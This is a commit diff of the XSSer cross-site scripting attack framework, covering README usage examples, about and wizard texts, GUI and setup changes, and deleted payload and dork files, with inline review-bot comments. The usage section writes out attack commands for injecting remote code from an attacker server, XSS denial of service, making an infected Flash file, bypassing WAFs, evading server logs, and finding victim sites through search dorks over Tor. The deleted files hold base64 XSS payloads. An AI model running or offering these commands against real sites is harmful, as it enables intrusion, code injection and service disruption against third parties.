+    These options can be used to specify the final code to inject on
+    vulnerable target(s). Important if you want to exploit 'on-the-wild'
+    the vulnerabilities found. Choose only one option:
+
+    --Fp=FINALPAYLOAD   OWN    - Exploit your own code
+    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-
+
+  *Special Final injection(s)*:
+    These options can be used to execute some 'special' injection(s) on
+    vulnerable target(s). You can select multiple and combine them with
+    your final code (except with DCP exploits):
+
+    --Anchor            ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)
+    --B64               B64  - Base64 code encoding in META tag (rfc2397)
+    --Onm               ONM  - Use onMouseMove() event
+    --Ifr               IFR  - Use <iframe> source tag
+    --Dos               DOS  - XSS (client) Denial of Service
+    --Doss              DOSs - XSS (server) Denial of Service
+
+  *Reporting*:
+    --save              Export to file (XSSreport.raw)
+    --xml=FILEXML       Export to XML (--xml file.xml)
+
+  *Miscellaneous*:
+    --silent            Inhibit console output results
+    --alive=ISALIVE     Set limit of errors before check if target is alive
+    --update            Check for latest stable version
+
+================================================================
+Commands and examples:
+==============================
+
+---------------------------------------
+
+* View HELP (Available commands):
+ 
+  xsser -h (--help)
+
+----------------------------------------
+
+* Check for latest stable version:
+
+  xsser --update
+
+----------------------------------------
+
+* Launch GTK interface (GUI):
+
+  xsser --gtk
+
+----------------------------------------
+
+* Simple injection from URL:<br><br>
+
+  xsser -u "https://target.com/XSS"
+
+----------------------------------------
+
+* Simple injection from File, with Tor proxy and spoofing HTTP Referer headers
+
+  xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "127.0.0.1"
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:
+
+  xsser -u "https:/target.com/XSS" --auto --reverse-check -s
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, using Tor proxy, using "Hexadecimal" encoding, with verbose output and saving results to file (XSSreport.raw):
+
+  xsser -u "https://target.com/XSS" --auto --proxy "http://127.0.0.1:8118" --Hex --verbose --save
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
+
+  xsser -u "https://target.com/XSS" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer Pentesting Tool" --timeout "20" --threads "5"
+
+----------------------------------------
+
+* Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:
+
+  xsser -i "urls.txt" --payload "<script>alert('XSSed');</script>" --Une
+
+----------------------------------------
+
+* Injection from Dork, selecting "DuckDuckGo" as search engine:
+
+  xsser --De "duck" -d "search.php?q="
+
+----------------------------------------
+
+* Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):
+
+  xsser -l --Da 
+
+----------------------------------------
+
+* Injection from Crawler with deep 2 and 200 pages to review (XSSer Spider!):
+
+  xsser -c 200 --Cw=2 -u "https://target.com"
+
+----------------------------------------
+
+* Simple injection from URL, to a POST parameter (ex: password), with statistics results:
+
+  xsser -u "https://target.com/login.php" -p "username=admin&password=XSS" -s
+
+----------------------------------------
+
+* Multiple injections (with hex and int hashes) to multiple parameters on a single URLG and using GET:
+
+  xsser -u "https://target.com" -g "login.php?=usernameXSS&password=XSS&captcha=X1S" --auto
+
+----------------------------------------
+
+* Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and if exists any vulnerability, exploiting your -own- final code:
+
+  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Coo --Dom --Fp="<script>alert('XSSed');</script>"
+
+----------------------------------------
+
+* Simple injection from URL, using GET and if exists any vulnerability, exploit a DoS (Denegation Of Service):
+
+  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Dos
+
+----------------------------------------
+
+* Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!): 
+
+  xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose 
+
+----------------------------------------
+
+* Injection of a XSS code provided by user on a -fake- image (ready to be uploaded to your public profile):<br><br>
+
+  xsser --Imx "test.png" --payload="<script>alert('XSSed');</script>"
+
+----------------------------------------
+
+* Report dorking search (using all search engines) to a XML file:
+
+  xsser -d "login.php" --Da --xml "security_report_XSSer_Dork_login-php_allengines.xml" 
+
+----------------------------------------
+
+* Create a malicious Flash movie :
+
+  xsser --fla "INFECTED_movie.swf"
+
+----------------------------------------
+
+* Send a pre-checking hash to search for false -false positives-:
+
+  xsser -u "https://target.com" --hash
+
+----------------------------------------
+
+* Discover parameters filtered on your target using heuristics:
+
+  xsser -u "https://target.com" --heuristic
+
+----------------------------------------
+
+* Exploiting Base64 code encoding in META tag (rfc2397), just after inject a manual payload:
+ 
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --payload="<script>alert('XSSed');</script>" --B64
+
+----------------------------------------
+
+* Exploiting your "own" -remote code- after discover a vulnerability using automatic fuzzing:<br><br>
+ 
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --auto --Fr "https://attacker_server.net/exploits/XSS/code.js"</b><br>
+
+----------------------------------------
+
+* Apply Anti-antiXSS bypassers (ex: Imperva) before to inject you -own- code with verbose output:
+
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --Imperva --payload="<script>alert('XSSed');</script>" -v
+
+----------------------------------------
+
+* Search also "XSSer" on the Internet for more videos and tutorials...
+
+  [...]
+

xsser/doc/requirements.txt → doc/requirements.txt


+ 20 - 16
xsser/gtk/docs/about.txt

@@ -4,7 +4,7 @@
                                                                     `.`                   ..              
                                                                     `.`                   ..              
             Welcome to XSSer ....                       `-:`              .-`               
             Welcome to XSSer ....                       `-:`              .-`               
                                                                         `/-     -      +`                                        
                                                                         `/-     -      +`                                        
-                                                                          o     +      /                                  v1.7.2b -> ZiKA-47 Swarm!
+                                                                          o     +      /                                  v1.8[1] -> "The Hive!"
                                                                           ./   -Ny    /.                                         
                                                                           ./   -Ny    /.                                         
                                                              `::-`       :--yMN:--.      `.....                      
                                                              `::-`       :--yMN:--.      `.....                      
                                          `mMMMMMmdhysoooosMyoo+oyhdmNMMMMMMMs       
                                          `mMMMMMmdhysoooosMyoo+oyhdmNMMMMMMMs       
@@ -16,7 +16,7 @@
                                                                   .::`     h`  o-  o.    :+.                       
                                                                   .::`     h`  o-  o.    :+.                       
                        GPLv3                                .--.        :o      y       :/.          
                        GPLv3                                .--.        :o      y       :/.          
                                                                ``            h      .s         -:.        
                                                                ``            h      .s         -:.        
-                                                                              :/       o.          ``                2011/2018 - by psy
+                                                                              :/       o.          ``                2010/2019 - by psy
                                                                             .o         o                   
                                                                             .o         o                   
                                                                              o          ./                  
                                                                              o          ./                  
                                                                             +`           :.                 
                                                                             +`           :.                 
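Review bot: the copyright range changes from 2011/2018 to 2010/2019 here, and the same edit is made to setup.py and the xsser launcher below, but the deleted core/fuzzing/DCP.py header still reads 2011/2016 and the core modules in this commit are not all shown; make sure every per-file header, doc/COPYING and doc/AUTHOR agree on the same start year, otherwise the project carries three different claims about when it began.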
@@ -53,22 +53,25 @@
       Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities 
       Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities 
       in web-based applications.
       in web-based applications.
 
 
-      It contains several options to try to bypass certain filters, and various special techniques of code injection.
+      It provides several options to try to bypass certain filters and various special techniques for code injection.
 
 
       ----------
       ----------
 
 
-      XSSer contains 'exploits' for this browsers:
-
-        - [Chrome]: Google Chrome.
-        - [IE9.0]: Internet Explorer 9.0. 
-        - [IE8.0]: Internet Explorer 8.0.
-        - [IE7.0]: Internet Explorer 7.0. 
-        - [IE6.0]: Internet Explorer 6.0.
-        - [NS8.1-IE]: Netscape 8.1+ in IE rendering engine mode. 
-        - [NS8.1-G]: Netscape 8.1+ in the Gecko rendering engine mode.
-        - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel. 
-        - [Opera]: Opera. 
-        - [NS4]: Netscape 4.0.
+      XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs:
+
+        - [PHPIDS]: PHP-IDS
+        - [Imperva]: Imperva Incapsula WAF
+        - [WebKnight]: WebKnight WAF
+        - [F5]: F5 Big IP WAF
+        - [Barracuda]: Barracuda WAF
+        - [ModSec]: Mod-Security
+        - [QuickDF]: QuickDefense
+        - [Chrome]: Google Chrome
+        - [IE]: Internet Explorer
+        - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel
+        - [NS-IE]: Netscape in IE rendering engine mode   
+        - [NS-G]: Netscape in the Gecko rendering engine mode
+        - [Opera]: Opera
 
 
     ====================================
     ====================================
     Documentation:
     Documentation:
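Review bot: the bracketed tags in the new list do not match the options a user has to type. The CLI flags documented in the README removed by this commit are `--Phpids0.6.5`, `--Phpids0.7`, `--Imperva`, `--Webknight`, `--F5bigip`, `--Barracuda`, `--Modsec` and `--Quickdefense`, but the list shows `[PHPIDS]`, `[WebKnight]`, `[F5]`, `[ModSec]` and `[QuickDF]`, and the PHPIDS 0.6.5/0.7 split is lost. Either print the real flag beside each entry or say explicitly that these are the tags shown in results, not option names. The sentence "has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs" should read "ships more than 1300 XSS vectors and includes bypass payloads for the following WAFs and browsers". Note also that the IE 6/7/8/9 entries collapse to a single `[IE]` here while the xsser.ui hunk in this same commit still labels buttons "Internet Explorer 9" and "IE 6"; keep the two in step. The `[NS-IE]` line ends in trailing whitespace.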
@@ -102,6 +105,7 @@
 
 
       You can also clone the latest development version from the XSSer repository:
       You can also clone the latest development version from the XSSer repository:
 
 
+            $ git clone https://code.03c8.net/epsylon/xsser
             $ git clone https://github.com/epsylon/xsser
             $ git clone https://github.com/epsylon/xsser
 
 
       For more details, check the main website: 
       For more details, check the main website: 
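Review bot: two clone URLs are now listed (code.03c8.net and github.com) without saying which is the primary repository and which is a mirror. For a tool that users point at third-party targets, and that ships a `--update` check, the documentation should state which origin is authoritative and how a release is verified (a tag, a checksum or a signature), so a user who lands on the mirror is not pulling a stale or diverged tree.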
@@ -124,5 +128,5 @@
     Community:
     Community:
     ===================
     ===================
 
 
-      You can join #xsser community on: irc.freenode.net
+      You can FREE JOIN! #xsser community on: irc.freenode.net
 
 
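Review bot: "You can FREE JOIN! #xsser community on: irc.freenode.net" is harder to read than the line it replaces; "You can join the #xsser community for free on irc.freenode.net" keeps the point without the shouting.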

+ 16 - 0
gtk/docs/wizard0.txt

@@ -0,0 +1,16 @@
+         
+         
+          
+    ==========
+
+    Welcome to the Wizard Helper!
+
+
+    You only need to reply some questions to create your pentesting. If you haven't time to read, just press "Next". :-)
+
+    XSSer will take your answers to -automagically- build commands.
+
+
+    Press "Start Wizard" button (below) to begin with your configuration...
+
+    ==========
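Review bot: "to create your pentesting" drops the noun the deleted version of this file had ("your pentesting attack"); restore it or say "your pentesting session". "If you haven't time to read" should be "If you don't have time to read", and "build commands" lost the "all the necessary" qualifier for no clear reason. The three leading lines of the file contain only spaces.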

+ 2 - 2
xsser/gtk/docs/wizard1.txt

@@ -3,10 +3,10 @@
 
 
     ==========
     ==========
 
 
-    OK!, so now is time to -fly your mosquito(es)-. You need to set some parameters: 
+    OK!, so now it is time to try to -fly- your mosquitoes-. For that, you need first to set some parameters: 
 
 
 
 
-        1)- I want to enter the url of my target, directly.
+        1)- I want to enter urls of my target, directly.
    
    
         2)- I don't know where are my targets... I just want to explore! :-)
         2)- I don't know where are my targets... I just want to explore! :-)
 
 

xsser/gtk/docs/wizard2.txt → gtk/docs/wizard2.txt


xsser/gtk/docs/wizard3.txt → gtk/docs/wizard3.txt


xsser/gtk/docs/wizard4.txt → gtk/docs/wizard4.txt


xsser/gtk/docs/wizard5.txt → gtk/docs/wizard5.txt


xsser/gtk/docs/wizard6.txt → gtk/docs/wizard6.txt


xsser/gtk/images/world.png → gtk/images/world.png


xsser/gtk/images/xsser.jpg → gtk/images/xsser.jpg


xsser/gtk/images/xssericon_16x16.png → gtk/images/xssericon_16x16.png


xsser/gtk/images/xssericon_24x24.png → gtk/images/xssericon_24x24.png


xsser/gtk/images/xssericon_32x32.png → gtk/images/xssericon_32x32.png


+ 1 - 1
xsser/gtk/xsser.desktop

@@ -1,5 +1,5 @@
 [Desktop Entry]
 [Desktop Entry]
-Version=1.1
+Version=1.8
 Type=Application
 Type=Application
 Name=XSSer
 Name=XSSer
 Comment=XSSer Framework
 Comment=XSSer Framework
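Review bot: `Version=1.8` misuses the key. In a .desktop file, `Version` is the version of the Desktop Entry Specification the file conforms to (1.0, 1.1, 1.5), not the application's version, and `desktop-file-validate` flags unknown values. Keep `Version=1.1` (or 1.5) and put the application version somewhere else if it must appear, for example in the `Comment`.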

+ 69 - 1
xsser/gtk/xsser.ui

@@ -13,7 +13,7 @@
     <property name="can_default">True</property>
     <property name="can_default">True</property>
     <property name="has_tooltip">True</property>
     <property name="has_tooltip">True</property>
     <property name="border_width">1</property>
     <property name="border_width">1</property>
-    <property name="title" translatable="yes">XSSer v1.7b: "ZiKA-47 Swarm!" - (https://xsser.03c8.net)</property>
+    <property name="title" translatable="yes">XSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net)</property>
     <property name="window_position">center-always</property>
     <property name="window_position">center-always</property>
     <property name="destroy_with_parent">True</property>
     <property name="destroy_with_parent">True</property>
     <property name="icon">images/xssericon_24x24.png</property>
     <property name="icon">images/xssericon_24x24.png</property>
@@ -1722,6 +1722,74 @@
                           <object class="GtkVBox" id="vbox27">
                           <object class="GtkVBox" id="vbox27">
                             <property name="visible">True</property>
                             <property name="visible">True</property>
                             <property name="can_focus">False</property>
                             <property name="can_focus">False</property>
+      			   <child>
+                              <object class="GtkCheckButton" id="firefox">
+                                <property name="label" translatable="yes">Firefox 12</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: FF</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="chrome">
+                                <property name="label" translatable="yes">Chrome 19 &amp; Firefox 12</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: Chrome + FF</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="iexplorer">
+                                <property name="label" translatable="yes">Internet Explorer 9</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: IE</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="opera">
+                                <property name="label" translatable="yes">Opera 10.5 &amp; IE 6</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: Opera + IE</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
                             <child>
                             <child>
                               <object class="GtkCheckButton" id="phpids">
                               <object class="GtkCheckButton" id="phpids">
                                 <property name="label" translatable="yes">PHPIDS (&lt;0.6.5)</property>
                                 <property name="label" translatable="yes">PHPIDS (&lt;0.6.5)</property>
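Review bot: all four new GtkCheckButton children are packed with `<property name="position">4</property>`, so their order relative to each other and to the existing `phpids` button that follows is whatever GTK resolves at build time rather than what the file says; number them sequentially and shift the positions of the children after them. The labels also disagree with the ids and tooltips: id `chrome` is labelled "Chrome 19 &amp; Firefox 12" (tooltip "Browser: Chrome + FF") while a separate `firefox` button already covers "Firefox 12", and id `opera` is "Opera 10.5 &amp; IE 6" while `iexplorer` is "Internet Explorer 9". If these buttons map to the vector tags `[Chrome]`, `[FF]`, `[IE]` and `[Opera]` listed in about.txt in this same commit, name each button after a single tag and drop the 2012-era version numbers, which the about.txt list no longer mentions. The `<child>` line of the first new button is indented with a tab while the rest of the file uses spaces.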

+ 3 - 9
xsser/setup.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -23,9 +21,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 """
 from setuptools import setup
 from setuptools import setup
 import os
 import os
-
 data_files = []
 data_files = []
-
 image_files = []
 image_files = []
 doc_files = []
 doc_files = []
 gtk_doc_files = []
 gtk_doc_files = []
@@ -35,16 +31,14 @@ for afile in os.listdir('doc'):
 for afile in os.listdir('gtk/docs'):
 for afile in os.listdir('gtk/docs'):
     if afile != '.svn':
     if afile != '.svn':
         gtk_doc_files.append('gtk/docs/' + afile)
         gtk_doc_files.append('gtk/docs/' + afile)
-
 data_files = ['gtk/images/world.png', 'gtk/images/xsser.jpg',
 data_files = ['gtk/images/world.png', 'gtk/images/xsser.jpg',
               'gtk/images/xssericon_16x16.png',
               'gtk/images/xssericon_16x16.png',
               'gtk/images/xssericon_24x24.png']
               'gtk/images/xssericon_24x24.png']
 gtk_files = ['gtk/xsser.ui']
 gtk_files = ['gtk/xsser.ui']
 gtk_app_files = ['gtk/xsser.desktop']
 gtk_app_files = ['gtk/xsser.desktop']
-
 setup(
 setup(
     name = "xsser",
     name = "xsser",
-    version = "1.7",
+    version = "1.8",
     packages = ['core', 'core.fuzzing', 'core.post'],
     packages = ['core', 'core.fuzzing', 'core.post'],
     data_files = [('/usr/share/doc/xsser/', doc_files), 
     data_files = [('/usr/share/doc/xsser/', doc_files), 
                   ('/usr/share/xsser/gtk/images/', data_files),
                   ('/usr/share/xsser/gtk/images/', data_files),
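Review bot: `version = "1.8"` disagrees with the rest of this commit, which calls itself v1.8.1 in the commit title and "v1.8[1]" in about.txt and xsser.ui; pick one canonical string (1.8.1) and use it everywhere, since `--update` compares against the "latest stable version" and packaging metadata keys off this field. The `if afile != '.svn'` filter in the loops above is a Subversion leftover in a git repository and can go. The absolute `/usr/share/...` destinations in `data_files` (visible in the context lines) also mean a `--user` or virtualenv install needs root; prefer paths relative to the install prefix.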

+ 2 - 4
xsser/xsser

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 0 - 55
xsser/core/fuzzing/DCP.py

@@ -1,55 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-"
-# vim: set expandtab tabstop=4 shiftwidth=4:
-"""
-$Id$
-
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
-
-xsser is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 3 of the License.
-
-xsser is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with xsser; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-## This file contains different XSS fuzzing vectors.
-## If you have some new, please email me to [epsylon@riseup.net]
-## Happy Cross Hacking! ;)
-
-DCPvectors = [
-		{ 'payload' : """<a href="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv YT4=""",
-                  'browser' : """[Data Control Protocol Injection]""" },
-
-		{ 'payload' : """<iframe src="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv""",
-		  'browser' : """[Data Control Protocol Injection]"""},	
-	
-		#{ 'payload' : """data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+""",
-                #  'browser' : """[Data Control Protocol Injection]"""},
-
-		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KCJYU1MiKStBRHMtaGlzdG9yeS5iYWNrKCkrQURzQVBBLS9z-""",
-		#  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,LCtBRHdBY3dCakFISUFhUUJ3QUhRQVBnKy1hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCkrQURz""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,K0FEd0Fjd0JqQUhJQWFRQndBSFFBUGdCaEFHd0FaUUJ5QUhRQUtBQXhBQ2tBT3dCb0FHa0Fjd0Iw""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KFhTUykrQURzLWhpc3RvcnkuYmFjaygpK0FEc0FQQS0vc2Ny aXB0K0FENC0=""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+'))""",
-		  'browser' : """[Data Control Protocol Injection]"""},
-
-		{ 'payload' : """""",
-                  'browser' : """[Data Control Protocol Injection]""" }
-		]
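Review bot: the deleted vector list ends with an entry whose payload is the empty string (`{ 'payload' : """""", 'browser' : """[Data Control Protocol Injection]""" }`); an empty payload produces a request that injects nothing and can only add noise or a false positive to the results. The first payload's base64 also contains a stray space (`...Pjwv YT4=`), worth checking. This file reappears as core/fuzzing/DCP.py in the same commit, so confirm that the empty entry and the five commented-out `data:` URLs did not simply travel with the move.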

+ 0 - 30
xsser/core/fuzzing/dorks.txt

@@ -1,30 +0,0 @@
-.php?cmd=
-.php?z=
-.php?q=
-.php?search=
-.php?query=
-.php?searchst­ring=
-.php?keyword=­
-.php?file=
-.php?years=
-.php?txt=
-.php?tag=
-.php?max=
-.php?from=
-.php?author=
-.php?pass=
-.php?feedback­=
-.php?mail=
-.php?cat=
-.php?vote=
-search.php?q=
-headersearch.p­hp?sid=
-/news.php?id=
-/search_results.php?search=
-/notice.php?msg= 
-/view.php?PID= 
-/search.php?search_keywords=
-/contentPage.php?id= 
-/main.php?sid=
-/feedpost.php?url=
-/poll/­default.asp?catid=
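Review bot: several of the deleted dorks contain an invisible soft hyphen (U+00AD) inside the string (`.php?searchst­ring=`, `.php?keyword=­`, `.php?feedback­=`, `headersearch.p­hp?sid=`, `/poll/­default.asp?catid=`), so those queries can never match what a search engine indexes, and three more entries end in a trailing space that becomes part of the query. The list is re-added as core/fuzzing/dorks.txt (40 lines) in this commit; confirm the new file was retyped rather than copied, or strip the bytes with GNU `sed 's/\xc2\xad//g'` and trim trailing whitespace before committing.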

File diff suppressed because it is too large
+ 0 - 1145
xsser/core/fuzzing/vectors.py


File diff suppressed because it is too large
+ 0 - 2700
xsser/core/main.py


+ 0 - 17
xsser/doc/AUTHOR

@@ -1,17 +0,0 @@
-========================
-
-    nick: psy (epsylon) 
-  
-    email: <epsylon@riseup.net> 
-
-=======================
-
-    web: https://03c8.net
-
-    code: https://github.com/epsylon
-
-=======================
-
-    btc: 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
-
-========================

+ 0 - 171
xsser/doc/README

@@ -1,171 +0,0 @@
-================================================================
-Introduction:
-==============================
-
-Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
-
-It contains several options to try to bypass certain filters, and various special techniques of code injection.
-
-================================================================
-Options and features:
-==============================
- 
-xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
-[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
-
-Cross Site "Scripter" is an automatic -framework- to detect, exploit and
-report XSS vulnerabilities in web-based applications.
-
-Options:
-  --version             show program's version number and exit
-  -h, --help            show this help message and exit
-  -s, --statistics      show advanced statistics output results
-  -v, --verbose         active verbose mode output results
-  --gtk                 launch XSSer GTK Interface
-  --wizard              start Wizard Helper!
-
-  *Special Features*:
-    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
-    code embedded. XST allows you to discover if target is vulnerable to
-    'Cross Site Tracing' [CAPEC-107]:
-
-    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
-    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
-    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)
-
-  *Select Target(s)*:
-    At least one of these options must to be specified to set the source
-    to get target(s) urls from:
-
-    --all=TARGET        Automatically audit an entire target
-    -u URL, --url=URL   Enter target to audit
-    -i READFILE         Read target(s) urls from file
-    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
-    -l                  Search from a list of 'dorks'
-    --De=DORK_ENGINE    Use this search engine (default: yahoo)
-    --Da                Search massively using all search engines
-
-  *Select type of HTTP/HTTPS Connection(s)*:
-    These options can be used to specify which parameter(s) we want to use
-    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
-    inject:
-
-    -g GETDATA          Send payload using GET (ex: '/menu.php?id=3&q=XSS')
-    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
-    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
-    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default 3)
-    --Cl                Crawl only local target(s) urls (default TRUE)
-
-  *Configure Request(s)*:
-    These options can be used to specify how to connect to the target(s)
-    payload(s). You can choose multiple:
-
-    --cookie=COOKIE     Change your HTTP Cookie header
-    --drop-cookie       Ignore Set-Cookie header from response
-    --user-agent=AGENT  Change your HTTP User-Agent header (default SPOOFED)
-    --referer=REFERER   Use another HTTP Referer header (default NONE)
-    --xforw             Set your HTTP X-Forwarded-For with random IP values
-    --xclient           Set your HTTP X-Client-IP with random IP values
-    --headers=HEADERS   Extra HTTP headers newline separated
-    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
-    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
-    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
-    --ignore-proxy      Ignore system default HTTP proxy
-    --timeout=TIMEOUT   Select your timeout (default 30)
-    --retries=RETRIES   Retries when the connection timeouts (default 1)
-    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
-    --delay=DELAY       Delay in seconds between each HTTP request (default 0)
-    --tcp-nodelay       Use the TCP_NODELAY option
-    --follow-redirects  Follow server redirection responses (302)
-    --follow-limit=FLI  Set limit for redirection requests (default 50)
-
-  *Checker Systems*:
-    These options are useful to know if your target is using filters
-    against XSS attacks:
-
-    --hash              send a hash to check if target is repeating content
-    --heuristic         discover parameters filtered by using heuristics
-    --discode=DISCODE   set code on reply to discard an injection
-    --checkaturl=ALT    check reply using: alternative url -> Blind XSS
-    --checkmethod=ALTM  check reply using: GET or POST (default: GET)
-    --checkatdata=ALD   check reply using: alternative payload
-    --reverse-check     establish a reverse connection from target to XSSer to
-                        certify that is 100% vulnerable (recommended!)
-
-  *Select Vector(s)*:
-    These options can be used to specify injection(s) code. Important if
-    you don't want to inject a common XSS vector used by default. Choose
-    only one option:
-
-    --payload=SCRIPT    OWN  - Inject your own code
-    --auto              AUTO - Inject a list of vectors provided by XSSer
-
